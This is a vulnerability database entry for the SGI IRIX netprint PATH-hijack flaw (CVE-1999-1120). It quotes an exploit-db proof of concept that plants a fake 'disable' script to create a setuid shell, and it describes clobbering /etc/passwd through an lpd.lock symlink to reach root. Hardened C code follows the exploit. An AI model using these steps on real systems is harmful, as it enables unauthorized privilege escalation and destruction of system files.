SGI IRIX Privilege Permission Vulnerability

Vulnerability ID 1105278 Vulnerability type Unknown
Published 1997-01-04 Updated 2005-05-02
CVE ID CVE-1999-1120 CNNVD ID CNNVD-199701-042
Platform IRIX CVSS score 4.6
|Vulnerability sources
https://www.exploit-db.com/exploits/19313
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199701-042
|Vulnerability details
SGI IRIX 6.4 and earlier trust the PATH environment variable when locating and executing the disable program, so a local user can gain privileges.
|Vulnerability EXP
source: http://www.securityfocus.com/bid/395/info


A vulnerability exists in the netprint program, shipping with Irix 6.x and 5.x by Silicon Graphics. The netprint program calls the "disable" command via a system() call, without specifying an explicit path. Therefore, any program in the path named disable can be executed as user lp.

% cat > /tmp/disable
cp /bin/sh /tmp/lpshell
chmod 4755 /tmp/lpshell
^D
% set path=(. $path)
% netprint -n blah -h blah -p blah 1-234
% /tmp/lpshell

However, one can go further if the BSD printing subsystem is installed. /usr/spool/lpd is owned by lp, and it's the place where lpd writes its lock file. lpd is also root/suid. So one replaces /usr/spool/lpd/lpd.lock with a symlink to /etc/passwd and runs lpd, and passwd gets nuked. Then one repeats the netprint trick, and, voila, disable now runs as root, because lp is not found in passwd. Kinda neat.
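The defect behind the exploit above is a privileged program resolving a helper through the caller's PATH. Below, as an added C example (not SGI's netprint source; /usr/lib/disable is an assumed location), is the vulnerable call pattern beside a hardened one, plus a check a privileged program can run on its inherited PATH before trusting it.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>

/* Returns 1 if PATH holds an entry a local user could control: an empty
 * component (leading, trailing or doubled ':'), ".", or any relative
 * directory. A setuid program calling system() with such a PATH runs
 * whatever the user put there, which is how netprint's "disable" was hijacked. */
int path_has_untrusted_entry(const char *path)
{
    if (path == NULL || *path == '\0')
        return 1;                        /* unset/empty PATH implies "." */
    const char *p = path;
    for (;;) {
        const char *end = strchr(p, ':');
        size_t len = end ? (size_t)(end - p) : strlen(p);
        if (len == 0 || p[0] != '/')     /* "" or a relative component */
            return 1;
        if (end == NULL)
            return 0;
        p = end + 1;
    }
}

/* The defect: "disable" is resolved via the caller's PATH, and the
 * argument is parsed by a shell as well. This is the pattern to avoid. */
int run_disable_vulnerable(const char *printer)
{
    char cmd[256];
    snprintf(cmd, sizeof cmd, "disable %s", printer);
    return system(cmd);
}

/* Hardened: absolute path, no shell, and a fixed minimal environment,
 * so neither PATH nor IFS inherited from the caller affects what runs.
 * Returns the helper's exit status, 127 if it could not be executed. */
int run_disable_hardened(const char *printer)
{
    char *const argv[] = { "/usr/lib/disable", (char *)printer, NULL }; /* assumed path */
    char *const envp[] = { "PATH=/usr/bin:/bin", NULL };
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve(argv[0], argv, envp);
        _exit(127);                      /* exec failed: never fall back to PATH */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```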
|References

Source: XF
Name: sgi-netprint(2107)
Link: http://xforce.iss.net/static/2107.php
Source: BID
Name: 395
Link: http://www.securityfocus.com/bid/395
Source: BUGTRAQ
Name: 19970104 Irix: netprint story
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=87602167420403&w=2
Source: SGI
Name: 19961203-02-PX
Link: ftp://patches.sgi.com/support/free/security/advisories/19961203-02-PX
Source: OSVDB
Name: 993
Link: http://www.osvdb.org/993
Source: SGI
Name: 19961203-01-PX
Link: ftp://patches.sgi.com/support/free/security/advisories/19961203-01-PX